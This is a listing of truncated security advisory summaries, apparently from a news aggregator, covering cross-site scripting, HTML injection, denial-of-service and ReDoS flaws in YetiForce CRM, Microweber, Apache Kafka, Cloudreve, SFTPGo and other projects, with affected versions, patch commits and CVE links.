MODERATE

[yetiforce/yetiforce-crm] YetiForce CRM vulnerable to stored Cross-site Scripting via SlaPolicy module

YetiForce CRM versions 6.4.0 and prior are vulnerable to cross-site scripting via the SlaPolicy module. A patch is available at commit e55886781509fe39951fc7528347696474a17884.
References

https://nvd.nist.gov/vuln/detail/CVE-2022-3005
https://github.c…

[yetiforce/yetiforce-crm] YetiForce CRM vulnerable to stored Cross-site Scripting via WidgetsManagement module

YetiForce CRM versions 6.4.0 and prior are vulnerable to cross-site scripting via the WidgetsManagement module. A patch is available at commit b716ecea340783b842498425faa029800bd30420.
References

https://nvd.nist.gov/vuln/detail/CVE-2022-2924
https://…

[yetiforce/yetiforce-crm] YetiForce CRM vulnerable to stored Cross-site Scripting via WorkFlow module

YetiForce CRM versions 6.4.0 and prior are vulnerable to cross-site scripting via the WorkFlow module. A patch is available at commit cd82ecce44d83f1f6c10c7766bf36f3026de024a.
References

https://nvd.nist.gov/vuln/detail/CVE-2022-3004
https://github.co…

[microweber/microweber] Microweber Cross-site Scripting can result in redirection to a malicious site

Microweber versions 1.3.1 and prior are vulnerable to HTML injection that an attacker can use to redirect someone to a malicious site. A patch is available at commit 68f0721571653db865a5fa01c7986642c82e919c and expected to be part of version 1.3.2.
Ref…

[org.apache.kafka:kafka] Apache Kafka vulnerability can lead to brokers hitting OutOfMemoryException, causing Denial of Service

A security vulnerability has been identified in Apache Kafka. It affects all releases since 2.8.0. The vulnerability allows malicious unauthenticated clients to allocate large amounts of memory on brokers. This can lead to brokers hitting OutOfMemoryEx…

[yetiforce/yetiforce-crm] YetiForce CRM vulnerable to stored Cross-site Scripting via LayoutEditor module

YetiForce CRM versions 6.4.0 and prior are vulnerable to cross-site scripting via the LayoutEditor module. A patch is available at commit eebc12601495ada38495076bec12841b2477516b.
References

https://nvd.nist.gov/vuln/detail/CVE-2022-3000
https://githu…

[microweber/microweber] Microweber vulnerable to HTML Injection in create tag functionality

HTML injection attack is closely related to Cross-site Scripting (XSS). HTML injection uses HTML to deface the page. XSS, as the name implies, injects JavaScript into the page. Both attacks exploit insufficient validation of user input. A patch is avai…

[github.com/HFO4/cloudreve] Cross site scripting in Cloudreve

Cloudreve versions v1.0.0 through v3.5.3 are vulnerable to Stored Cross-Site Scripting (XSS), via the file upload functionality. A low privileged user will be able to share a file with an admin user, which could lead to privilege escalation.
References…

[steal] steal Inefficient Regular Expression Complexity vulnerability via string variable

A Regular Expression Denial of Service (ReDoS) flaw was found in stealjs steal 2.2.4 via the string variable in babel.js.
References

https://nvd.nist.gov/vuln/detail/CVE-2022-37259
https://github.com/stealjs/steal/issues/1528
https://github.com/stealj…

[github.com/drakkan/sftpgo] SFTPGo WebClient vulnerable to Cross-site Scripting

Impact
Cross-site scripting (XSS) vulnerabilities have been reported to affect SFTPGo WebClient. If exploited, this vulnerability allows remote attackers to inject malicious code.
Patches
Fixed in v2.3.5.
References

https://github.com/drakkan/sftpgo/s…

トピトピニュース

Featured

[org.keycloak:keycloak-core] Stored Cross-Site Scripting (XSS) in Keycloak via groups dropdown

[baserproject/basercms] baserproject/basercms vulnerable to cross-site scripting (XSS) vulnerability

[org.postgresql:postgresql] TemporaryFolder on unix-like systems does not limit access to created files

[com.h2database:h2] Password exposure in H2 Database